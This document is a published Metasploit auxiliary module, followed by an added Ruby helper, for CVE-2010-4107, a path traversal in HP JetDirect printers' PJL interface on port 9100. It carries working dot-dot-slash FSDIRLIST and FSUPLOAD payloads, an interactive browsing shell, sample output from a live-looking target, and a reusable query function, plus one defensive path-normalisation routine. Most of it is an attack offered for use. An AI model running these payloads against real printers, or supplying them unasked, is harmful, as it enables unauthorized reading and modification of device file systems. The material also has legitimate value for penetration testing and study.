# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal
# Date: Aug 7, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.hp.com
# Version: All
# Tested on: HP LaserJet Pxxxx Series

##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# Sample Output:
#
# msf auxiliary(hp_printer_pjl_traversal) > show options
#
# Module options (auxiliary/admin/hp_printer_pjl_traversal):
#
#    Name         Current Setting  Required  Description
#    ----         ---------------  --------  -----------
#    INTERACTIVE  false            no        Enter interactive mode [msfconsole Only]
#    RHOST        202.138.16.21    yes       The target address
#    RPATH        /                yes       The remote filesystem path to browse or read
#    RPORT        9100             yes       The target port
#
# msf auxiliary(hp_printer_pjl_traversal) > run
#
# [*] cd / ...
# [+] Server returned the following response:
#
# .         TYPE=DIR
# ..        TYPE=DIR
# bin       TYPE=DIR
# usr       TYPE=DIR
# etc       TYPE=DIR
# hpmnt     TYPE=DIR
# hp        TYPE=DIR
# lib       TYPE=DIR
# dev       TYPE=DIR
# init      TYPE=FILE SIZE=9016
# .profile  TYPE=FILE SIZE=834
# tmp       TYPE=DIR
#
# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true
# INTERACTIVE => true
# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp
# RPATH => /hp
# msf auxiliary(hp_printer_pjl_traversal) > run
#
# [*] Entering interactive mode ...
# [*] cd /hp ...
# [+] Server returned the following response:
#
# .           TYPE=DIR
# ..          TYPE=DIR
# app         TYPE=DIR
# lib         TYPE=DIR
# bin         TYPE=DIR
# webServer   TYPE=DIR
# images      TYPE=DIR
# DemoPage    TYPE=DIR
# loc         TYPE=DIR
# AsianFonts  TYPE=DIR
# data        TYPE=DIR
# etc         TYPE=DIR
# lrt         TYPE=DIR
#
# [*] Current RPATH: /hp
# [*] -> 'quit' to exit
# [*] -> '/' to return to file system root
# [*] -> '..' to move up one directory
# [*] -> '!r FILE' to read FILE in the current directory
#
# [*] Enter RPATH:
# $ > webServer/config
# [*] cd /hp/webServer/config ...
# [+] Server returned the following response:
#
# .          TYPE=DIR
# ..         TYPE=DIR
# soe.xml    TYPE=FILE SIZE=23615
# version.6  TYPE=FILE SIZE=45
#
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] -> '/' to return to file system root
# [*] -> '..' to move up one directory
# [*] -> '!r FILE' to read FILE in the current directory
#
# [*] Enter RPATH:
# $ > !r version.6
# [*] cat /hp/webServer/config/version.6 ...
# [+] Server returned the following response:
#
# WebServer directory version. Do not delete!
#
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] -> '/' to return to file system root
# [*] -> '..' to move up one directory
# [*] -> '!r FILE' to read FILE in the current directory
#
# [*] Enter RPATH:
# $ > quit
# [*] Exited ... Have fun with your Printer!
# [*] Auxiliary module execution completed
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'HP JetDirect PJL Interface Universal Path Traversal',
			'Version'     => '$Revision: 1 $',
			'Description' => %q{
					This module exploits a path traversal issue in possibly all HP
				network-enabled printer series, especially those which expose the
				Printer Job Language (PJL) command interface through the default
				JetDirect port 9100. With decade-old dot-dot-slash payloads, the
				entire printer file system can be read or modified.
			},
			'Author'      =>
				[
					'Moritz Jodeit <http://www.nruns.com/>',                   # Bug Discoverer
					'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>'    # Metasploit Module
				],
			'License'     => MSF_LICENSE,
			'References'  =>
				[
					[ 'CVE', '2010-4107' ],
					[ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ],
					[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ],
					[ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],
					[ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],
					[ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],
					[ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]
				],
			'DisclosureDate' => '2010-11-15'))

		register_options(
			[
				OptString.new('RPATH', [ true, "The remote filesystem path to browse or read", "/" ]),
				OptBool.new('INTERACTIVE', [ false, "Enter interactive mode [msfconsole Only]", false ]),
				Opt::RPORT(9100)
			], self.class)
	end

	def run
		if datastore['INTERACTIVE'] == true
			set_interactive(datastore['RPATH'])
		else
			set_onetime(datastore['RPATH'])
		end
	end

	# Simple shell over the PJL file system: browse directories with FSDIRLIST,
	# read files with FSUPLOAD. State is kept in rpath (current directory).
	def set_interactive(spath)
		action   = 'DIR'
		rpath    = spath
		rfpath   = ''
		tmp_path = ''
		tmp_file = ''
		cur_dir  = '/'

		print_status("Entering interactive mode")
		stop = false
		set_onetime(rpath)

		until stop == true
			print_status("Current RPATH: #{rpath}")
			print_status("-> 'quit' to exit")
			print_status("-> '/' to return to file system root")
			print_status("-> '..' to move up one directory")
			print_status("-> '!r FILE' to read FILE in the current directory\r\n")
			print_status("Enter RPATH:")
			print("$ > ")
			tmp_path = gets.chomp.to_s

			if tmp_path =~ /\.\./ && rpath.length > 2
				# Move up one directory by cutting at the last slash.
				new_path = rpath[0, rpath.rindex('/')]
				rpath = new_path.nil? ? '/' : new_path
				rpath = '/' if rpath.length == 0
				print_status("Change to one up directory: #{rpath}")
			elsif tmp_path =~ /\!r\s/
				# Read a file relative to the current directory.
				cur_dir  = rpath
				tmp_file = tmp_path.gsub('!r ', '')
				rfpath   = cur_dir + '/' + tmp_file
				rfpath   = rfpath.gsub('//', '/')
				action   = 'FILE'
			elsif tmp_path == '/'
				rpath = '/'
			elsif rpath != '/'
				rpath = rpath + '/' << tmp_path
			else
				rpath = rpath << tmp_path
			end

			if rpath =~ /quit/
				stop  = true
				rpath = '/'
				print_status("Exited ... Have fun with your Printer!")
			else
				rpath = rpath.gsub('//', '/')
				if action == 'FILE'
					set_onetime(rfpath, action)
					cur_dir = rpath
				else
					set_onetime(rpath, action)
				end
				action = 'DIR'
			end
		end
	end

	# Issue a single PJL file-system request. saction is 'DIR' (FSDIRLIST) or
	# 'FILE' (FSUPLOAD); the module registers no ACTION option, so the default
	# is a directory listing, which is what the sample output shows for 'run'.
	def set_onetime(spath, saction = 'DIR')
		rpathx = spath
		action = saction
		rpathx = '/' if rpathx =~ /\/quit/

		connect

		# Both requests are wrapped in the Universal Exit Language sequence
		# (ESC %-12345X) and prefix the path with volume 0: plus dot-dot-slash,
		# which the vulnerable firmware does not canonicalise before opening.
		dir_cmd  = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
		file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"

		if action =~ /DIR/
			r_cmd = dir_cmd.sub("[REPLACE]", rpathx)
			print_status("cd #{rpathx} ...")
		else
			r_cmd = file_cmd.sub("[REPLACE]", rpathx)
			print_status("cat #{rpathx} ...")
		end

		sock.put(r_cmd)
		res = sock.get(-1, 1)

		if (!res)
			print_error("ERROR in receiving data!\r\n")
		else
			if res.to_s =~ /ERROR/
				print_error("Operation Not Permitted or File/DIR Not Found!\r\n")
				disconnect
				return
			end
			# The first line of the reply echoes the request; drop it.
			res = res.to_s
			idx = res.index("\r\n")
			resx = idx ? res[idx + 1, res.length] : res
			print_good("Server returned the following response:\r\n#{resx}")
		end

		disconnect
	end
end
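The module above sends two raw PJL requests and prints whatever comes back. The following Ruby is an added, stand-alone example that is not part of the Metasploit module: it builds the same FSDIRLIST and FSUPLOAD requests (same UEL framing, same `0:/../../../` prefix), parses an FSDIRLIST reply into structured entries, and shows the canonicalisation check a PJL file-system handler would need in order to refuse such names. The sample reply is constructed from the listing in the module's sample output, so nothing here contacts a printer unless you call `query` yourself; the `safe_volume_path` routine is an illustrative hardening, not HP's firmware fix.

```ruby
# Added example, not part of the original module. Builds the module's PJL
# requests, parses an FSDIRLIST reply, and shows the path check the
# vulnerable firmware lacked. Runs offline against a constructed reply.
require 'socket'

module PjlTraversal
  UEL = "\e%-12345X"             # Universal Exit Language: enter PJL mode
  TRAVERSAL_PREFIX = '0:/../../../' # volume 0: plus the module's dot-dot-slash prefix

  # FSDIRLIST request, framed exactly as the module frames it.
  def self.dir_cmd(path)
    "#{UEL}@PJL FSDIRLIST NAME=\"#{TRAVERSAL_PREFIX}#{path}\" ENTRY=1 COUNT=99999999\r\n#{UEL}\r\n"
  end

  # FSUPLOAD request that reads a file from offset 0.
  def self.file_cmd(path)
    "#{UEL}@PJL FSUPLOAD NAME=\"#{TRAVERSAL_PREFIX}#{path}\" OFFSET=0 SIZE=99999999\r\n#{UEL}\r\n"
  end

  # Constructed FSDIRLIST reply modelled on the module's sample output:
  # first line echoes the request, then one entry per line, then a form feed.
  SAMPLE_REPLY = "@PJL FSDIRLIST NAME=\"0:/../../..//\" ENTRY=1\r\n" \
                 ". TYPE=DIR\r\n.. TYPE=DIR\r\nbin TYPE=DIR\r\netc TYPE=DIR\r\n" \
                 "init TYPE=FILE SIZE=9016\r\n.profile TYPE=FILE SIZE=834\r\n\f"

  # Parse an FSDIRLIST reply into [{name:, type:, size:}, ...].
  # Returns nil when the printer answered with a PJL error (e.g. FILEERROR=n).
  def self.parse_dirlist(response)
    return nil if response =~ /ERROR/
    response.lines.drop(1).map(&:strip).reject(&:empty?).map do |line|
      m = line.match(/\A(?<name>\S+)\s+TYPE=(?<type>DIR|FILE)(?:\s+SIZE=(?<size>\d+))?\z/)
      m && { name: m[:name], type: m[:type], size: m[:size] ? m[:size].to_i : nil }
    end.compact
  end

  # What a fixed handler should do before opening anything: collapse '.' and
  # '..' and refuse the name if it ever climbs above the volume root.
  # Returns the normalised "<vol>:/<path>" or nil if the name escapes.
  def self.safe_volume_path(name)
    vol, rest = name.split(':', 2)
    return nil unless vol =~ /\A\d\z/ && rest
    parts = []
    rest.split('/').each do |seg|
      case seg
      when '', '.' then next
      when '..'
        return nil if parts.empty? # would leave the volume: reject, do not clamp
        parts.pop
      else
        parts << seg
      end
    end
    "#{vol}:/#{parts.join('/')}"
  end

  # Send one request to a real printer on the JetDirect port and return the
  # raw reply (not exercised by the constructed sample above).
  def self.query(host, cmd, port: 9100, timeout: 5)
    sock = TCPSocket.new(host, port)
    sock.write(cmd)
    buf = +''
    buf << sock.readpartial(4096) while IO.select([sock], nil, nil, timeout)
    buf
  rescue EOFError
    buf
  ensure
    sock.close if sock
  end
end

if $PROGRAM_NAME == __FILE__
  PjlTraversal.parse_dirlist(PjlTraversal::SAMPLE_REPLY).each do |e|
    puts "#{e[:name].ljust(10)} #{e[:type]}#{e[:size] ? " SIZE=#{e[:size]}" : ''}"
  end
  puts PjlTraversal.safe_volume_path('0:/../../../etc/passwd').inspect # nil: rejected
end
```

Note that `dir_cmd('/')` reproduces the module's double slash (`0:/../../..//`) on purpose; the vulnerable firmware accepted it, and `safe_volume_path` shows why it should not have: after collapsing segments the three `..` climb past the volume root, so the name is rejected outright rather than silently clamped to `0:/`.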